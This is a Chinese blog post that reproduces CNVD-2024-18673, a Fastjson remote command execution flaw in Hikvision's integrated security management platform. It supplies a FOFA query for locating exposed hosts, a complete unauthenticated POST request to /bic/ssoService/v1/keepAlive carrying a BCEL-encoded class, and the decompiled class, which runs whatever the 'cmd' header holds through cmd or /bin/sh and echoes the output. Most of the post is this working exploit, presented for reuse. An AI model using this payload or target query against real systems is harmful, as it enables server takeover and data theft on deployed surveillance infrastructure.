海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现

已于 2024-06-26 18:16:50 修改
阅读量1k 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 漏洞复现 rce漏洞 fastjson 海康威视
于 2024-06-19 18:34:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/139810232
版权

海康威视部分综合安防管理平台管理平台存在Fastjson远程命令执行漏洞,攻击者可通过构造恶意Payload执行并获取服务器系统权限以及敏感数据信息。

1.漏洞级别

高危

2.漏洞搜索

fofa:

title="综合安防管理平台"

3.影响范围

未知

4.漏洞复现

这个漏洞比较简单,在/bic/ssoService/v1/keepAlive 接口存在fastjson漏洞,构造post请求即可触发。

POST /bic/ssoService/v1/keepAlive HTTP/1.1
Host: 
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
cmd: whoami
Connection: close
Content-Length: 3330

{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}}

漏洞存在即可直接回显结果。
在这里插入图片描述

4.2 利用代码简单分析

payload中的二进制代码是BCEL类的加密内容。如果想要进行分析的话 ,可以通过工具来直接解析出结果。
随文附上解析工具 ,执行

java -jar BCELCode.jar -d 1.txt

解析出的内容如下

// Source code is decompiled from a .class file using FernFlower decompiler.
package com.fastjson.vul;

import java.lang.reflect.Method;
import java.util.Scanner;

public class SpringEcho {
   public SpringEcho() {
   }

   static {
      try {
         Class var0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
         Method var1 = var0.getMethod("getRequestAttributes");
         Object var2 = var1.invoke((Object)null);
         var0 = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
         var1 = var0.getMethod("getResponse");
         Method var3 = var0.getMethod("getRequest");
         Object var4 = var1.invoke(var2);
         Object var5 = var3.invoke(var2);
         Method var6 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
         Method var7 = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader", String.class);
         var7.setAccessible(true);
         var6.setAccessible(true);
         Object var8 = var6.invoke(var4);
         String var9 = (String)var7.invoke(var5, "cmd");
         String[] var10 = new String[3];
         if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            var10[0] = "cmd";
            var10[1] = "/c";
         } else {
            var10[0] = "/bin/sh";
            var10[1] = "-c";
         }

         var10[2] = var9;
         var8.getClass().getDeclaredMethod("println", String.class).invoke(var8, (new Scanner(Runtime.getRuntime().exec(var10).getInputStream())).useDelimiter("\\A").next());
         var8.getClass().getDeclaredMethod("flush").invoke(var8);
         var8.getClass().getDeclaredMethod("close").invoke(var8);
      } catch (Exception var11) {
      }

   }
}

有兴趣的可以自己研究一下。

如有问题欢迎随时沟通~

fly夏天
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
做自己喜欢的事,并将其发挥到极致!
06-02 1万+
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload 接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行
海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现
0xSec
06-07 1786
由于海康威视综合安防管理平台使用了低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。
漏洞复现海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞
siu~
06-07 965
由于海康威视综合安防管理平台使用了低版本的fastison,不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。
漏洞复现海康威视综合安防管理平台 iSecure Center applyCT fastjson 远程代码执行
siu~
05-21 1196
海康威视综合安防管理平台 `iSecure Center applyCT fastjson` 远程代码执行
海康威视iSecure-Center 综合安防管理平台 applyAutoLoginTicket/keepAlive/applyCT 远程命令执行漏洞
WuYSec的博客
06-12 793
海康威视iSecure Center综合安防管理平台是一套集成化、智能化的安防管理系统。海康威视iSecure Center综合安防管理平台存在远程命令执行漏洞,可造成远程命令执行
海康威视综合安防管理平台Fastjson远程命令执行漏洞
holyxp的博客
07-24 1951
综合安防管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
漏洞复现海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-28 8582
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 4878
海康威视越权访问CVE-2021-7921漏洞复现
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 3508
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 5269
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
海康8700安防综合管理平台-操作指南(CS)V2.3.doc
11-30
海康8700安防综合管理平台-操作指南(CS)V2.3》文档主要介绍了如何使用该平台进行远程集中监控与管理海康8700平台旨在实现音视频监控录像系统、防盗报警系统、远程控制和语音对讲等子系统的无缝集成,强调系统...
海康平台iSecure+Center综合安防管理平台配置手册+V1.6.1.zip
08-10
海康威视iSecure+Center综合安防管理平台是一款专业且强大的安防系统集成工具,它集成了视频监控、门禁控制、报警管理等多种功能,旨在提供一个统一的操作界面和高效的管理解决方案。V1.6.1版本是该平台的一个具体...
海康综合安防管理平台培训PPT.pptx
08-10
海康综合安防管理平台是一款专为安防监控设计的高效、集成化的管理软件,它整合了多种安防子系统,如视频监控、周界报警等,旨在提供全面的安全保障和便捷的操作体验。以下是对平台主要功能的详细说明: 1. **平台...
iSecure Center综合安防管理平台配置手册 V2.0.0
01-04
海康威视iSecure Center综合安防管理平台配置手册 V2.0.0】是针对该公司的安防管理系统的一份详细指南。iSecure Center是一个一体化、智能化的解决方案,它旨在通过集成视频监控、停车场管理、门禁控制以及报警...
iSecure Center 综合安防管理平台安装部署手册 - Linux.pdf
12-10
综合安防管理平台安装部署手册,详细介绍了如何安装iSecure 如何每一步操作都很清晰,如果有任何问题都可以问我,我装了好多遍
漏洞复现海康威视 综合安防管理平台 session接口 远程代码执行漏洞
最新发布
凝聚力安全团队
06-19 1666
海康综合安防管理平台 session 接口存在 fastjson 反序列化漏洞。攻击者可在未鉴权的情况下,对目标服务器进行远程命令执行,从而获取服务器权限。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
【1day】复现海康综合安防管理平台 applyCT Fastjson远程命令执行漏洞
记录并分享学习安全的知识点..
07-24 688
海康威视综合安防管理平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度,海康综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限。
漏洞复现】Hikvision综合安防管理平台config信息泄露漏洞
晚风不及你
01-21 2034
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康综合安防管理平台漏洞
02-28
很抱歉,我不能提供关于海康综合安防管理平台漏洞的信息。我是一个AI助手,我不能提供关于漏洞的详细信息或者攻击方法。如果您对海康综合安防管理平台的安全性有疑问或者发现了潜在的漏洞,建议您及时联系海康威视公司或者相关安全团队进行报告和咨询。他们将能够提供专业的帮助和支持。 如果您有其他关于网络安全、软件开发或者其他技术方面的问题,我会很乐意为您解答。请告诉我您还有其他问题吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值